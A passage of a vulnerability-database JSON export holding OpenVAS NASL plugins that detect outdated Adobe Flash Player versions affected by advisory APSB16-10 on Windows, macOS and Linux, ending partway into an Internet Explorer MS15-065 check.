script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-04-12 18:40:52 +0530 (Tue, 12 Apr 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsb16-10 )-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to bypass memory layout\n randomization mitigations, also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.343 and 20.x before 21.0.0.213 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.343, or 21.0.0.213, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20\", test_version2:\"21.0.0.212\"))\n{\n fix = \"21.0.0.213\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.343\"))\n{\n fix = \"18.0.0.343\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:17:42", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810716", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810716", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Mac OS X\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810716\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:07:47 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow remote attackers to bypass memory layout randomization mitigations,\n also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.213 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.213 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.213\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.213\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:19:09", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810667", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810667", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810667\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:05:37 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow remote attackers to bypass memory layout randomization mitigations,\n also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.213 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.213 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.213\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.213\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:34", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-04-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsb16-10 )-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310807655", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807655", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsb16-10 )-MAC OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807655\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-04-12 18:40:50 +0530 (Tue, 12 Apr 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsb16-10 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to bypass memory layout\n randomization mitigations, also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.343 and 20.x before 21.0.0.213 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.343, or 21.0.0.213, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20\", test_version2:\"21.0.0.212\"))\n{\n fix = \"21.0.0.213\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.343\"))\n{\n fix = \"18.0.0.343\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:20:58", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810668", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810668", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810668\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:07:54 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow remote attackers to bypass memory layout randomization mitigations,\n also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.213 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.213 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.213\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.213\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:55", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-04-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsb16-10 )-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310807654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807654", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsb16-10 )-Linux\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807654\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-04-12 18:40:46 +0530 (Tue, 12 Apr 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsb16-10 )-Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to bypass memory layout\n randomization mitigations, also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.616 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.616 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.616\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.616\");\n security_message(data:report);\n exit(0);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T19:51:39", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS15-065.", "cvss3": {}, "published": "2015-07-15T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (3076321)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1767", "CVE-2015-2401", "CVE-2015-2385", "CVE-2015-2422", "CVE-2015-1738", "CVE-2015-2391", "CVE-2015-2414", "CVE-2015-2383", "CVE-2015-2408", "CVE-2015-2413", "CVE-2015-1729", "CVE-2015-2404", "CVE-2015-2403", "CVE-2015-2410", "CVE-2015-2402", "CVE-2015-2419", "CVE-2015-2390", "CVE-2015-2397", "CVE-2015-2388", "CVE-2015-2398", "CVE-2015-2425", "CVE-2015-2411", "CVE-2015-1733", "CVE-2015-2412", "CVE-2015-2372", "CVE-2015-2384", "CVE-2015-2406", "CVE-2015-2421", "CVE-2015-2389"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310805720", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805720", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (3076321)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n 